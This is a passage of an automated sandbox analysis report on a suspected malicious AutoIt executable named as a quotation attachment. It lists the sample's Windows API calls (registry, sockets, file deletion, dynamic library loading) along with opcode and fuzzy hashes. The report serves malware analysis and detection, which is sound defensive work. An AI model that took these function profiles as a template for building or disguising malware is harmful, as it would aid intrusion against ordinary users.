                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0
                                                                                      • API String ID: 3076010158-4108050209
                                                                                      • Opcode ID: 02c9707213547990d139bce0d474604eb65136777bb78c4fa628e9b78e1877b9
                                                                                      • Instruction ID: 355f451538e805bcef36b6b3d8ed9b624f86abd859623a73a440746569fc543d
                                                                                      • Opcode Fuzzy Hash: 02c9707213547990d139bce0d474604eb65136777bb78c4fa628e9b78e1877b9
                                                                                      • Instruction Fuzzy Hash: 4E414B75A00209EFDB10DF90D885ADAB7F5FF45395F044119ED259B250D770AE49CF60
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00121E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00121E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00121EA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 787153527-1403004172
                                                                                      • Opcode ID: 26e859497c96afd96059c015b20846cc621ac246e95d9ca9a42a0f125f3d5d39
                                                                                      • Instruction ID: 0dfe07e80e0a6f97bc40a34681ee27f0abeb09d656032219bad99f8529e5816e
                                                                                      • Opcode Fuzzy Hash: 26e859497c96afd96059c015b20846cc621ac246e95d9ca9a42a0f125f3d5d39
                                                                                      • Instruction Fuzzy Hash: 97213771A00204BEDB15EF64EC46DFFB7B9DF51350B104129F825A72E1DB344E198660
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00152F8D
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00152F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00152FA9
                                                                                      • DestroyWindow.USER32(?), ref: 00152FB1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      • Opcode ID: 122bd3a2a809ea87c891ee54c3af20e8a154fd758d893b3536095fde197c2b4d
                                                                                      • Instruction ID: 389de86050da0f9a3bca4032f24ae50f2ec102d12e73f85930583d50dc92c913
                                                                                      • Opcode Fuzzy Hash: 122bd3a2a809ea87c891ee54c3af20e8a154fd758d893b3536095fde197c2b4d
                                                                                      • Instruction Fuzzy Hash: BD218C72204205EFEB104F64EC80FBB77B9EB5A366F10461AFD60EA190D771DC959BA0
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000E4D1E,000F28E9,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002), ref: 000E4D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000E4DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,000E4D1E,000F28E9,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002,00000000), ref: 000E4DC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 815151d89a7262a063c734d64d7b94252e95c97a0a8e65b41e7edd5e962f6314
                                                                                      • Instruction ID: ee8fab756560f035d0085d820fefc488cd6f3517e21776bdb18887f96e6e5a0c
                                                                                      • Opcode Fuzzy Hash: 815151d89a7262a063c734d64d7b94252e95c97a0a8e65b41e7edd5e962f6314
                                                                                      • Instruction Fuzzy Hash: F5F03C35A40308EFDB519F95DC49BEEBBE5EB44752F0400A8B805A6660CB705A90CBD1
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E9C
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4EAE
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4EC0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-3689287502
                                                                                      • Opcode ID: a0f85571bacb0a5e79c359c664a37c3faca91c8b3935156194439a4a1bf8f02f
                                                                                      • Instruction ID: e3f24cfd7a567f062b6165b5c94018558f3d86b975c2117652ee9631353ce635
                                                                                      • Opcode Fuzzy Hash: a0f85571bacb0a5e79c359c664a37c3faca91c8b3935156194439a4a1bf8f02f
                                                                                      • Instruction Fuzzy Hash: F8E08635A01B22DFD2611F256C68F5F6694BF81F637060119FC00E6500DB60CD4185E0
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E62
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-1355242751
                                                                                      • Opcode ID: e1054590682e83da9de697bd410757d6d10383af70c5c25bfc9033345f443d6c
                                                                                      • Instruction ID: 10aa7ec4febd8ac90c766e34783451489792b0b410ce4231648e2aa4bf08586d
                                                                                      • Opcode Fuzzy Hash: e1054590682e83da9de697bd410757d6d10383af70c5c25bfc9033345f443d6c
                                                                                      • Instruction Fuzzy Hash: 2FD01235502B21DF96621F297C28ECF6A58BF85F523060519BD05AA555CF60CE41C5D0
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00132C05
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00132C87
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00132C9D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00132CAE
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00132CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$Copy
                                                                                      • String ID:
                                                                                      • API String ID: 3226157194-0
                                                                                      • Opcode ID: a49d38c344c6bf9e47f5733c04ac894020272b7b3c1a95ce555c8ec04c78caf2
                                                                                      • Instruction ID: 5db6f64145b6b56708e248a67074fe9f27521201156035cde84fd611e3f5d900
                                                                                      • Opcode Fuzzy Hash: a49d38c344c6bf9e47f5733c04ac894020272b7b3c1a95ce555c8ec04c78caf2
                                                                                      • Instruction Fuzzy Hash: 38B12E71900219AFDF25EBA4CC85EDEB77DEF49350F1040A6F509E6156EB30AA448F61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ec8ee899dee97235725bf44d8dcb8f850b44b6e7ac0465fc1b90593e07ca45a
                                                                                      • Instruction ID: f4620254c9cda82750f10020c4ea78bdfd56a5575b2e9d3cc398cde1e1b3ec0a
                                                                                      • Opcode Fuzzy Hash: 0ec8ee899dee97235725bf44d8dcb8f850b44b6e7ac0465fc1b90593e07ca45a
                                                                                      • Instruction Fuzzy Hash: 84C1F175A0434DAFCB61DFA9D841BFDBBF0AF09310F044099EA14A7792CB359941EB60
                                                                                      APIs
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00141DC0
                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00141DE1
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141DF2
                                                                                      • inet_ntoa.WSOCK32(?), ref: 00141E8C
                                                                                        • Part of subcall function 00143224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0013EC0C), ref: 00143240
                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00141EDB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3163710072-0
                                                                                      • Opcode ID: 0cc926976326822579bbc6959a363fb6f0b14ef49ff0b9b03440283b57308351
                                                                                      • Instruction ID: cbd6dc7f555b5a915e67b9d0b6c82afc9ab13416b652a2b1cd94d2045a0abd26
                                                                                      • Opcode Fuzzy Hash: 0cc926976326822579bbc6959a363fb6f0b14ef49ff0b9b03440283b57308351
                                                                                      • Instruction Fuzzy Hash: CFB1DD71604340AFC324DF24C895F6A7BA5AF84318F94895CF45A5B2E3DB31ED8ACB91
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001017FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001015CE
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00101651
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001017FB,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001016E4
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001016FB
                                                                                        • Part of subcall function 000F3820: RtlAllocateHeap.NTDLL(00000000,?,00191444,?,000DFDF5,?,?,000CA976,00000010,00191440,000C13FC,?,000C13C6,?,000C1129), ref: 000F3852
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00101777
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 1443698708-0
                                                                                      • Opcode ID: 90bfda338b1ba8e6eaa45d6083ba38386e030a2d4301080a893419cf339ac5a6
                                                                                      • Instruction ID: f8be285625cee7443e95183db45a9465af8db08009a14df5df5d36f5144d9a75
                                                                                      • Opcode Fuzzy Hash: 90bfda338b1ba8e6eaa45d6083ba38386e030a2d4301080a893419cf339ac5a6
                                                                                      • Instruction Fuzzy Hash: 8391B872E00216BEDB248EB4CC81AFE7BB5AF49710F184659E941EB1C1DBB9DD40CB60
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0014A427
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0014A435
                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0014A468
                                                                                      • CloseHandle.KERNEL32(?), ref: 0014A63D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3488606520-0
                                                                                      • Opcode ID: 6d31f0a24dc67730b306b86238a2f03766c6d4902254dd9bad00e32ce68b122a
                                                                                      • Instruction ID: f99fbc2fe9efdee113bdb5f00376c049d9cc25e82fa84a770bcb8736d2113944
                                                                                      • Opcode Fuzzy Hash: 6d31f0a24dc67730b306b86238a2f03766c6d4902254dd9bad00e32ce68b122a
                                                                                      • Instruction Fuzzy Hash: A6A1B0716043019FE720DF24C886F6AB7E5AF84714F55881DF59A9B3D2D7B0EC418B92
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014BAA5
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014BB00
                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0014BB63
                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0014BBA6
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014BBB3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 3740051246-0
                                                                                      • Opcode ID: 11aa2305b651cbc5975db79f878b5bfd9dd90e78438a746a37d6b47fdb8b0a2a
                                                                                      • Instruction ID: d28b93e3856744dc8ddb514ac532dc78a94645030a000818810e23ca1668c88b
                                                                                      • Opcode Fuzzy Hash: 11aa2305b651cbc5975db79f878b5bfd9dd90e78438a746a37d6b47fdb8b0a2a
                                                                                      • Instruction Fuzzy Hash: 4B616C31208241AFD714DF24C8D5E6ABBE5FF84318F54899CF4998B2A2DB31ED45CB92
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00128BCD
                                                                                      • VariantClear.OLEAUT32 ref: 00128C3E
                                                                                      • VariantClear.OLEAUT32 ref: 00128C9D
                                                                                      • VariantClear.OLEAUT32(?), ref: 00128D10
                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00128D3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                      • String ID:
                                                                                      • API String ID: 4136290138-0
                                                                                      • Opcode ID: 2b7a0d1c284677a059128f1ec9754c952fc3cc41060e95628d60e34986fc2dfa
                                                                                      • Instruction ID: a05c221047df2524d7e3b8a689dbfde00f8671fcdfdbebaa09b2d03f9f842889
                                                                                      • Opcode Fuzzy Hash: 2b7a0d1c284677a059128f1ec9754c952fc3cc41060e95628d60e34986fc2dfa
                                                                                      • Instruction Fuzzy Hash: 855159B5A01219EFDB14CF68D894EAAB7F8FF89310B158559E905DB350E730E921CFA0
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00103CD6,?,?,?,?,?,?,?,?,000F5BA3,?,?,00103CD6,?,?), ref: 000F5470
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00103CD6,00000005,00000000,00000000), ref: 000F552C
                                                                                      • WriteFile.KERNEL32(?,00103CD6,00000000,000F5BA3,00000000,?,?,?,?,?,?,?,?,?,000F5BA3,?), ref: 000F554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,000F5BA3,00000000,?,?,?,?,?,?,?,?,?,000F5BA3,?), ref: 000F5584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 977765425-0
                                                                                      • Opcode ID: 78e7a72796f5a7db176ed3f702ec89f072a77de78797331b14a0c5eafc5c19a8
                                                                                      • Instruction ID: 3048e01e5ca1c9f96a3417db456f294170786604d621d840916531a00690361f
                                                                                      • Opcode Fuzzy Hash: 78e7a72796f5a7db176ed3f702ec89f072a77de78797331b14a0c5eafc5c19a8
                                                                                      • Instruction Fuzzy Hash: DE51D171A00B099FDB11CFA8DC95AEEBBF9EF08701F14411AF655E7691D730AA41CBA0
                                                                                      APIs
                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00138BAE
                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00138BDA
                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00138C32
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00138C57
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00138C5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                      • String ID:
                                                                                      • API String ID: 2832842796-0
                                                                                      • Opcode ID: f30fe97349459fed337fa84ae0e319cc53407bc54386becf26d1706eb95aa4d8
                                                                                      • Instruction ID: a1c345138d0aa051060291fe18ed7df0b694408a280f62cd068ea280c806e836
                                                                                      • Opcode Fuzzy Hash: f30fe97349459fed337fa84ae0e319cc53407bc54386becf26d1706eb95aa4d8
                                                                                      • Instruction Fuzzy Hash: DC511835A006159FCB05DF64C881EADBBF5FF48314F088459E849AB362DB35ED51DBA0
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00148F40
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00148FD0
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00148FEC
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00149032
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00149052
                                                                                        • Part of subcall function 000DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00131043,?,75CBE610), ref: 000DF6E6
                                                                                        • Part of subcall function 000DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0011FA64,00000000,00000000,?,?,00131043,?,75CBE610,?,0011FA64), ref: 000DF70D
                                                                                      Memory Dump Source
